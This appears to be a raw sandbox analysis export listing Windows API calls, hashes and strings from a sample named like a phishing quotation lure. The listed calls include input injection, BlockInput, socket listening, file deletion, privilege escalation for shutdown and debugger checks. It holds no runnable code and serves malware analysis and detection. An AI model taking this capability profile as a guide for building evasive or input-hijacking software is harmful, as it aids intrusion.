                                                                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?), ref: 006BBFA9
                                                                            • RegCloseKey.ADVAPI32(00000000), ref: 006BBFCD
                                                                            • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 006BC02C
                                                                            • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 006BC0E7
                                                                            • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 006BC154
                                                                            • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 006BC1E9
                                                                            • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,00000000,?,?,?,00000000), ref: 006BC23A
                                                                            • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 006BC2E3
                                                                            • RegCloseKey.ADVAPI32(?,?,00000000), ref: 006BC382
                                                                            • RegCloseKey.ADVAPI32(00000000), ref: 006BC38F
                                                                            Similarity
                                                                            • API ID: QueryValue$Close$BuffCharConnectOpenRegistryUpper
                                                                            • String ID:
                                                                            • API String ID: 3218304859-0
                                                                            • Opcode ID: 2010c33f5821fcc6a1eff96e7c6f0efa42f2bfa4fac8c738358840392c3f2d20
                                                                            • Instruction ID: 3bedabb73069f2f6c006ece26724af19137115df8557319eeb143c9eb546d7b7
                                                                            • Opcode Fuzzy Hash: 2010c33f5821fcc6a1eff96e7c6f0efa42f2bfa4fac8c738358840392c3f2d20
                                                                            • Instruction Fuzzy Hash: 5F026EB16042009FD714DF28C895E6AB7E6EF89314F18849DF44ADB3A2DB31ED45CB91
                                                                            APIs
                                                                            • GetLocalTime.KERNEL32(?), ref: 006A8257
                                                                            • SystemTimeToFileTime.KERNEL32(?,?), ref: 006A8267
                                                                            • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 006A8273
                                                                            • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 006A8310
                                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 006A8324
                                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 006A8356
                                                                            • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 006A838C
                                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 006A8395
                                                                            Strings
                                                                            Similarity
                                                                            • API ID: CurrentDirectoryTime$File$Local$System
                                                                            • String ID: *.*
                                                                            • API String ID: 1464919966-438819550
                                                                            • Opcode ID: 689d92a18364b58ca84c54f96afa32d3e6aa7e5fabd29c9011568ac574852c16
                                                                            • Instruction ID: e3ab84d0803f6b6ec73c8aa29243d6e1850db16474780aca5fd8a06872946a08
                                                                            • Opcode Fuzzy Hash: 689d92a18364b58ca84c54f96afa32d3e6aa7e5fabd29c9011568ac574852c16
                                                                            • Instruction Fuzzy Hash: AF6159725043059FCB50EF60C8409AEB3EABF89320F04891EF98997251DB35ED45CF96
                                                                            APIs
                                                                              • Part of subcall function 00633AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00633A97,?,?,00632E7F,?,?,?,00000000), ref: 00633AC2
                                                                              • Part of subcall function 0069E199: GetFileAttributesW.KERNEL32(?,0069CF95), ref: 0069E19A
                                                                            • FindFirstFileW.KERNEL32(?,?), ref: 0069D122
                                                                            • DeleteFileW.KERNEL32(?,?,?,?,?,00000000,?,?,?), ref: 0069D1DD
                                                                            • MoveFileW.KERNEL32(?,?), ref: 0069D1F0
                                                                            • DeleteFileW.KERNEL32(?,?,?,?), ref: 0069D20D
                                                                            • FindNextFileW.KERNEL32(00000000,00000010), ref: 0069D237
                                                                              • Part of subcall function 0069D29C: CopyFileExW.KERNEL32(?,?,00000000,00000000,00000000,00000008,?,?,0069D21C,?,?), ref: 0069D2B2
                                                                            • FindClose.KERNEL32(00000000,?,?,?), ref: 0069D253
                                                                            • FindClose.KERNEL32(00000000), ref: 0069D264
                                                                            Strings
                                                                            Similarity
                                                                            • API ID: File$Find$CloseDelete$AttributesCopyFirstFullMoveNameNextPath
                                                                            • String ID: \*.*
                                                                            • API String ID: 1946585618-1173974218
                                                                            • Opcode ID: d3b7903e259dc523381e73070c8edb802d1a99b308d37539880b6f5204296157
                                                                            • Instruction ID: cffd477c6c9714cee1300e8cb8c2b51b8f0f6652c937e18d271e564ecca89333
                                                                            • Opcode Fuzzy Hash: d3b7903e259dc523381e73070c8edb802d1a99b308d37539880b6f5204296157
                                                                            • Instruction Fuzzy Hash: DD617C31C0514DAACF45EBE0CA929FDB7BBAF55300F204069E40277291EB31AF09DBA4
                                                                            APIs
                                                                            Similarity
                                                                            • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                                            • String ID:
                                                                            APIs
                                                                              • Part of subcall function 006916C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0069170D
                                                                              • Part of subcall function 006916C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0069173A
                                                                              • Part of subcall function 006916C3: GetLastError.KERNEL32 ref: 0069174A
                                                                            • ExitWindowsEx.USER32(?,00000000), ref: 0069E932
                                                                            Strings
                                                                            Similarity
                                                                            • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                                            • String ID: $ $@$SeShutdownPrivilege
                                                                            APIs
                                                                            • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 006B1276
                                                                            • WSAGetLastError.WSOCK32 ref: 006B1283
                                                                            • bind.WSOCK32(00000000,?,00000010), ref: 006B12BA
                                                                            • WSAGetLastError.WSOCK32 ref: 006B12C5
                                                                            • closesocket.WSOCK32(00000000), ref: 006B12F4
                                                                            • listen.WSOCK32(00000000,00000005), ref: 006B1303
                                                                            • WSAGetLastError.WSOCK32 ref: 006B130D
                                                                            • closesocket.WSOCK32(00000000), ref: 006B133C
                                                                            Similarity
                                                                            • API ID: ErrorLast$closesocket$bindlistensocket
                                                                            • String ID:
                                                                            APIs
                                                                              • Part of subcall function 00633AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00633A97,?,?,00632E7F,?,?,?,00000000), ref: 00633AC2
                                                                              • Part of subcall function 0069E199: GetFileAttributesW.KERNEL32(?,0069CF95), ref: 0069E19A
                                                                            • FindFirstFileW.KERNEL32(?,?), ref: 0069D420
                                                                            • DeleteFileW.KERNEL32(?,?,?,?), ref: 0069D470
                                                                            • FindNextFileW.KERNEL32(00000000,00000010), ref: 0069D481
                                                                            • FindClose.KERNEL32(00000000), ref: 0069D498
                                                                            • FindClose.KERNEL32(00000000), ref: 0069D4A1
                                                                            Strings
                                                                            Similarity
                                                                            • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                                                            • String ID: \*.*
                                                                            APIs
                                                                            • GetForegroundWindow.USER32(?,?,00000000), ref: 006B22E8
                                                                              • Part of subcall function 006AE4EC: GetWindowRect.USER32(?,?), ref: 006AE504
                                                                            • GetDesktopWindow.USER32 ref: 006B2312
                                                                            • GetWindowRect.USER32(00000000), ref: 006B2319
                                                                            • mouse_event.USER32(00008001,?,?,00000002,00000002), ref: 006B2355
                                                                            • GetCursorPos.USER32(?), ref: 006B2381
                                                                            • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 006B23DF
                                                                            Similarity
                                                                            • API ID: Window$Rectmouse_event$CursorDesktopForeground
                                                                            • String ID:
                                                                            APIs
                                                                            • FindFirstFileW.KERNEL32(00000001,?,*.*,?,?,00000000,00000000), ref: 006A9B78
                                                                            • FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 006A9C8B
                                                                              • Part of subcall function 006A3874: GetInputState.USER32 ref: 006A38CB
                                                                              • Part of subcall function 006A3874: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 006A3966
                                                                            • Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 006A9BA8
                                                                            • FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 006A9C75
                                                                            Strings
                                                                            Similarity
                                                                            • API ID: Find$File$CloseFirstInputMessageNextPeekSleepState
                                                                            • String ID: *.*
                                                                            APIs
                                                                              • Part of subcall function 00649BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00649BB2
                                                                            • DefDlgProcW.USER32(?,?,?,?,?), ref: 00649A4E
                                                                            • GetSysColor.USER32(0000000F), ref: 00649B23
                                                                            • SetBkColor.GDI32(?,00000000), ref: 00649B36
                                                                            Similarity
                                                                            • API ID: Color$LongProcWindow
                                                                            • String ID:
                                                                            APIs
                                                                              • Part of subcall function 006B304E: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 006B307A
                                                                            • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 006B185D
                                                                            • WSAGetLastError.WSOCK32 ref: 006B1884
                                                                            • bind.WSOCK32(00000000,?,00000010), ref: 006B18DB
                                                                            • WSAGetLastError.WSOCK32 ref: 006B18E6
                                                                            • closesocket.WSOCK32(00000000), ref: 006B1915
                                                                            Similarity
                                                                            • API ID: ErrorLast$bindclosesocketinet_addrsocket
                                                                            • String ID:
                                                                            APIs
                                                                            Similarity
                                                                            • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                                            • String ID:
                                                                            Strings
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: ERCP$VUUU$VUUU$VUUU$VUUU
                                                                            APIs
                                                                            • CoInitialize.OLE32(00000000), ref: 006A6639
                                                                            • CoCreateInstance.OLE32(006CFCF8,00000000,00000001,006CFB68,?), ref: 006A6650
                                                                            • CoUninitialize.OLE32 ref: 006A68D4
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: CreateInitializeInstanceUninitialize
                                                                            • String ID: .lnk
                                                                            • API String ID: 948891078-24824748
                                                                            • Opcode ID: e19874776948962a1ccb237f2b81b081b735561f11c1964f0abeb01371c0d9dc
                                                                            • Instruction ID: 840df65eca232902ba1fc3673c4cf2fe1863c3c4b5e0944315809551cc1ce56f
                                                                            • Opcode Fuzzy Hash: e19874776948962a1ccb237f2b81b081b735561f11c1964f0abeb01371c0d9dc
                                                                            • Instruction Fuzzy Hash: 69D13971508201AFD354EF24C881E6BB7EAFF95704F04496DF5958B2A1EB70ED05CBA2
                                                                            APIs
                                                                            • lstrlenW.KERNEL32(?,?,?,00000000), ref: 006982AA
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            Similarity
                                                                            • API ID: lstrlen
                                                                            • String ID: ($tbo$|
                                                                            • API String ID: 1659193697-2343487118
                                                                            • Opcode ID: 56233a1eb2dd7aa542b5a09f6496708f87c74d20f6fddb71ef057c36d493009a
                                                                            • Instruction ID: d62a8c293d8f25472e71f9e1059721989b243b8a5a3c914988c2d6c695239da8
                                                                            • Opcode Fuzzy Hash: 56233a1eb2dd7aa542b5a09f6496708f87c74d20f6fddb71ef057c36d493009a
                                                                            • Instruction Fuzzy Hash: 49324474A007059FCB28CF59C481AAAB7F5FF48710B15C46EE49ADB7A1EB70E941CB44
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                            • API String ID: 0-2761157908
                                                                            • Opcode ID: 394d06717f5209dc2950c209544e15646a25e54c85a5686582eeb882cb14e821
                                                                            • Instruction ID: 78f5f296f8f5d69b5852b3ccadfebfd4fc7e0e54c9e3f9d64b417092e3921666
                                                                            • Opcode Fuzzy Hash: 394d06717f5209dc2950c209544e15646a25e54c85a5686582eeb882cb14e821
                                                                            • Instruction Fuzzy Hash: 94C26B71E086288FDB65CF28DD407EAB7B6EB48305F1441EAD84EE7241E775AE858F40
                                                                            APIs
                                                                            • CreateToolhelp32Snapshot.KERNEL32 ref: 006BA6AC
                                                                            • Process32FirstW.KERNEL32(00000000,?), ref: 006BA6BA
                                                                            • Process32NextW.KERNEL32(00000000,?), ref: 006BA79C
                                                                            • CloseHandle.KERNEL32(00000000), ref: 006BA7AB
                                                                              • Part of subcall function 0064CE60: CompareStringW.KERNEL32(00000409,00000001,?,00000000,00000000,?,?,00000000,?,00673303,?), ref: 0064CE8A
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            Similarity
                                                                            • API ID: Process32$CloseCompareCreateFirstHandleNextSnapshotStringToolhelp32
                                                                            • String ID:
                                                                            • API String ID: 2000298826-0
                                                                            • Opcode ID: 277b28abf60b9d2539e6bd78d67441dce24c0cecace392a7a5463b20ea72624d
                                                                            • Instruction ID: b60cafd03068b1d8e11cba204cc90f04be6ae211e34313f30fe7f2d03792e185
                                                                            • Opcode Fuzzy Hash: 277b28abf60b9d2539e6bd78d67441dce24c0cecace392a7a5463b20ea72624d
                                                                            • Instruction Fuzzy Hash: 49516DB1508300AFD750EF24C886E6BBBEAFF89754F00892DF58997251EB70D904CB96
                                                                            APIs
                                                                            • GetKeyboardState.USER32(?,00000001,00000040,00000000), ref: 0069AAAC
                                                                            • SetKeyboardState.USER32(00000080), ref: 0069AAC8
                                                                            • PostMessageW.USER32(?,00000102,00000001,00000001), ref: 0069AB36
                                                                            • SendInput.USER32(00000001,?,0000001C,00000001,00000040,00000000), ref: 0069AB88
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            Similarity
                                                                            • API ID: KeyboardState$InputMessagePostSend
                                                                            • String ID:
                                                                            • API String ID: 432972143-0
                                                                            • Opcode ID: 1cb82b96ba282929649095405798940d22583f4fe6eb26712cc5efac9f3f2d6d
                                                                            • Instruction ID: 8e752b42933bfef0ba15b44d9c6afcdae9f9589767abda2adf9654a809cd4f6a
                                                                            • Opcode Fuzzy Hash: 1cb82b96ba282929649095405798940d22583f4fe6eb26712cc5efac9f3f2d6d
                                                                            • Instruction Fuzzy Hash: D6310930A40248AFEF358BA9CC05BFA77EFAB44320F04421AE5C556AD4D7749981C7E6
                                                                            APIs
                                                                            • InternetReadFile.WININET(?,?,00000400,?), ref: 006ACE89
                                                                            • GetLastError.KERNEL32(?,00000000), ref: 006ACEEA
                                                                            • SetEvent.KERNEL32(?,?,00000000), ref: 006ACEFE
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            Similarity
                                                                            • API ID: ErrorEventFileInternetLastRead
                                                                            • String ID:
                                                                            • API String ID: 234945975-0
                                                                            • Opcode ID: f5f3ab162f6048a8ceb610abee09ebe0a6d78b00963c450ec37cb9d60aa04218
                                                                            • Instruction ID: 3943683fd7bbffa7e07c55b87dea271796f03de7cc08c7b275d53e01b74c979e
                                                                            • Opcode Fuzzy Hash: f5f3ab162f6048a8ceb610abee09ebe0a6d78b00963c450ec37cb9d60aa04218
                                                                            • Instruction Fuzzy Hash: F5219DB1500705AFEB20EF65C948BA677FAEF42364F10442EE64692251E774EE09CFA4
                                                                            APIs
                                                                            • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 0065084B
                                                                            • IsDebuggerPresent.KERNEL32(?,?,?,?,00000017), ref: 00650916
                                                                            • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,00000017), ref: 00650936
                                                                            • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,00000017), ref: 00650940
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            Similarity
                                                                            • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                            • String ID:
                                                                            • API String ID: 254469556-0
                                                                            • Opcode ID: 913615b7bac0ab2ca14087a76eeb71dc70a7c4d6168d0782c667e248eec04243
                                                                            • Instruction ID: 694db9d16960781dd6a3ae80999d49710a35c80d5d4291cf4cc4ce3e9ff15a25
                                                                            • Opcode Fuzzy Hash: 913615b7bac0ab2ca14087a76eeb71dc70a7c4d6168d0782c667e248eec04243
                                                                            • Instruction Fuzzy Hash: BA314D75D0131D9BDB10DFA4D989BCDBBB8AF04301F1041EAE40DA7250EB759A888F44
                                                                            APIs
                                                                            • lstrlenW.KERNEL32(?,00675222), ref: 0069DBCE
                                                                            • GetFileAttributesW.KERNEL32(?), ref: 0069DBDD
                                                                            • FindFirstFileW.KERNEL32(?,?), ref: 0069DBEE
                                                                            • FindClose.KERNEL32(00000000), ref: 0069DBFA
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            Similarity
                                                                            • API ID: FileFind$AttributesCloseFirstlstrlen
                                                                            • String ID:
                                                                            • API String ID: 2695905019-0
                                                                            • Opcode ID: 05676ad06b82452439491b0144d3df84126f44daa453db984ea5b273ee8c087c
                                                                            • Instruction ID: 01d5e6c590f9dc244ef9e6b74b3286e87a9db68b553dd022c592933a3bee37c6
                                                                            • Opcode Fuzzy Hash: 05676ad06b82452439491b0144d3df84126f44daa453db984ea5b273ee8c087c
                                                                            • Instruction Fuzzy Hash: D6F0A0B081091097CB206B78EC0D8BA776E9E013B4B144712F83AC2AE0EBB45A558695
                                                                            APIs
                                                                            • SetUnhandledExceptionFilter.KERNEL32(00000000,?,00650D40,006CFE34,00000017), ref: 00650C26
                                                                            • UnhandledExceptionFilter.KERNEL32(006CFE34,?,00650D40,006CFE34,00000017), ref: 00650C2F
                                                                            • GetCurrentProcess.KERNEL32(C0000409,?,00650D40,006CFE34,00000017), ref: 00650C3A
                                                                            • TerminateProcess.KERNEL32(00000000,?,00650D40,006CFE34,00000017), ref: 00650C41
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            Similarity
                                                                            • API ID: ExceptionFilterProcessUnhandled$CurrentTerminate
                                                                            • String ID:
                                                                            • API String ID: 3231755760-0
                                                                            • Opcode ID: a59d38b57b8ff42b61059f097b649d2b693af68c90348b48630d6bec3c23f580
                                                                            • Instruction ID: 88ae640b956afd7a73cbc60e56435182c430de75e549e8b45993b245de0d6c2a
                                                                            • Opcode Fuzzy Hash: a59d38b57b8ff42b61059f097b649d2b693af68c90348b48630d6bec3c23f580
                                                                            • Instruction Fuzzy Hash: ABD01271444248ABC7002BE1FC0DE783F2EFB08626F08D000F70DC1421CB3144018B95
                                                                            APIs
                                                                            • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,006D3700), ref: 0066BB91
                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,0070121C,000000FF,00000000,0000003F,00000000,?,?), ref: 0066BC09
                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00701270,000000FF,?,0000003F,00000000,?), ref: 0066BC36
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            Similarity
                                                                            • API ID: ByteCharMultiWide$InformationTimeZone
                                                                            • String ID:
                                                                            • API String ID: 1904278450-0
                                                                            • Opcode ID: 3d5c5d4fbe460054a7404d459edc734daeeed20bc2f5b4a02921b40fef8d8fad
                                                                            • Instruction ID: 8cd827e47933ee21310ac3e70945d00115ee38873eade524ef555246b1184a1c
                                                                            • Opcode Fuzzy Hash: 3d5c5d4fbe460054a7404d459edc734daeeed20bc2f5b4a02921b40fef8d8fad
                                                                            • Instruction Fuzzy Hash: 53C12671A04205EFCB209F69CC41AEA7BBBEF41310F18629EE494D7352EB309E81CB54
                                                                            APIs
                                                                            • FindFirstFileW.KERNEL32(?,?), ref: 006A5CC1
                                                                            • FindNextFileW.KERNEL32(00000000,?), ref: 006A5D17
                                                                            • FindClose.KERNEL32(?), ref: 006A5D5F
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: Find$File$CloseFirstNext
                                                                            • String ID:
                                                                            • API String ID: 3541575487-0
                                                                            APIs
                                                                            • IsDebuggerPresent.KERNEL32 ref: 0066271A
                                                                            • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00662724
                                                                            • UnhandledExceptionFilter.KERNEL32(?), ref: 00662731
                                                                            Similarity
                                                                            • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                            • String ID:
                                                                            • API String ID: 3906539128-0
                                                                            APIs
                                                                            • SetErrorMode.KERNEL32(00000001), ref: 006A51DA
                                                                            • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 006A5238
                                                                            • SetErrorMode.KERNEL32(00000000), ref: 006A52A1
                                                                            Similarity
                                                                            • API ID: ErrorMode$DiskFreeSpace
                                                                            • String ID:
                                                                            • API String ID: 1682464887-0
                                                                            APIs
                                                                            • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0069170D
                                                                            • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0069173A
                                                                            • GetLastError.KERNEL32 ref: 0069174A
                                                                            Similarity
                                                                            • API ID: AdjustErrorLastLookupPrivilegePrivilegesTokenValue
                                                                            • String ID:
                                                                            • API String ID: 4244140340-0
                                                                            APIs
                                                                            • CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 0069D608
                                                                            • DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00000028,?,00000000), ref: 0069D645
                                                                            • CloseHandle.KERNEL32(?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 0069D650
                                                                            Similarity
                                                                            • API ID: CloseControlCreateDeviceFileHandle
                                                                            • String ID:
                                                                            • API String ID: 33631002-0
                                                                            APIs
                                                                            • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 0069168C
                                                                            • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 006916A1
                                                                            • FreeSid.ADVAPI32(?), ref: 006916B1
                                                                            Similarity
                                                                            • API ID: AllocateCheckFreeInitializeMembershipToken
                                                                            • String ID:
                                                                            • API String ID: 3429775523-0
                                                                            APIs
                                                                            • GetCurrentProcess.KERNEL32(006628E9,?,00654CBE,006628E9,006F88B8,0000000C,00654E15,006628E9,00000002,00000000,?,006628E9), ref: 00654D09
                                                                            • TerminateProcess.KERNEL32(00000000,?,00654CBE,006628E9,006F88B8,0000000C,00654E15,006628E9,00000002,00000000,?,006628E9), ref: 00654D10
                                                                            • ExitProcess.KERNEL32 ref: 00654D22
                                                                            Similarity
                                                                            • API ID: Process$CurrentExitTerminate
                                                                            • String ID:
                                                                            • API String ID: 1703294689-0
                                                                            Strings
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: /
                                                                            • API String ID: 0-2043925204
                                                                            APIs
                                                                            • GetUserNameW.ADVAPI32(?,?), ref: 0068D28C
                                                                            Strings
                                                                            Similarity
                                                                            • API ID: NameUser
                                                                            • String ID: X64
                                                                            • API String ID: 2645101109-893830106
                                                                            Strings
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: Variable is not of type 'Object'.$p#p
                                                                            • API String ID: 0-30852625
                                                                            APIs
                                                                            • FindFirstFileW.KERNEL32(?,?), ref: 006A6918
                                                                            • FindClose.KERNEL32(00000000), ref: 006A6961
                                                                            Similarity
                                                                            • API ID: Find$CloseFileFirst
                                                                            • String ID:
                                                                            • API String ID: 2295610775-0
                                                                            APIs
                                                                            • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,006B4891,?,?,00000035,?), ref: 006A37E4
                                                                            • FormatMessageW.KERNEL32(00001000,00000000,?,00000000,?,00000FFF,00000000,?,?,?,006B4891,?,?,00000035,?), ref: 006A37F4
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: ErrorFormatLastMessage
                                                                            • String ID:
                                                                            • API String ID: 3479602957-0
                                                                            APIs
                                                                            • SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 0069B25D
                                                                            • keybd_event.USER32(?,772EA2E0,?,00000000), ref: 0069B270
                                                                            Similarity
                                                                            • API ID: InputSendkeybd_event
                                                                            • String ID:
                                                                            • API String ID: 3536248340-0
                                                                            APIs
                                                                            • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,006911FC), ref: 006910D4
                                                                            • CloseHandle.KERNEL32(?,?,006911FC), ref: 006910E9
                                                                            Similarity
                                                                            • API ID: AdjustCloseHandlePrivilegesToken
                                                                            • String ID:
                                                                            • API String ID: 81990902-0
                                                                            Strings
                                                                            Similarity
                                                                            • API ID: BuffCharUpper
                                                                            • String ID: p#p
                                                                            • API String ID: 3964851224-1159509791
                                                                            APIs
                                                                            • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00666766,?,?,00000008,?,?,0066FEFE,00000000), ref: 00666998
                                                                            Similarity
                                                                            • API ID: ExceptionRaise
                                                                            • String ID:
                                                                            • API String ID: 3997070919-0
                                                                            Strings
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID: 0-3916222277
                                                                            APIs
                                                                            • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 006506B1
                                                                            Similarity
                                                                            • API ID: FeaturePresentProcessor
                                                                            • String ID:
                                                                            • API String ID: 2325560087-0
                                                                            Strings
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: b(j
                                                                            • API String ID: 0-1143529648
                                                                            APIs
                                                                            • BlockInput.USER32(00000001), ref: 006AEABD
                                                                            Similarity
                                                                            • API ID: BlockInput
                                                                            • String ID:
                                                                            • API String ID: 3456056419-0
                                                                            APIs
                                                                            • SetUnhandledExceptionFilter.KERNEL32(Function_000209E1,006503EE), ref: 006509DA
                                                                            Similarity
                                                                            • API ID: ExceptionFilterUnhandled
                                                                            • String ID:
                                                                            • API String ID: 3192549508-0
                                                                            Strings
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: 0
                                                                            • API String ID: 0-4108050209
                                                                            Strings
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: 0&p
                                                                            • API String ID: 0-1223806618
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 29f0f091381353cb008fec1b346e71f247c6decc5bf8a4ae90bb1317535b4eec
                                                                            • Instruction ID: ff60b1ee2491632fa3c3a711706edea957f86731c8dbd0356c58fc34d9c48f0e
                                                                            • Opcode Fuzzy Hash: 29f0f091381353cb008fec1b346e71f247c6decc5bf8a4ae90bb1317535b4eec
                                                                            • Instruction Fuzzy Hash: F132F321D2AF424DD7239634D832335A78AAFB73D9F15D737E81AB5AA5EF29C4834100
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
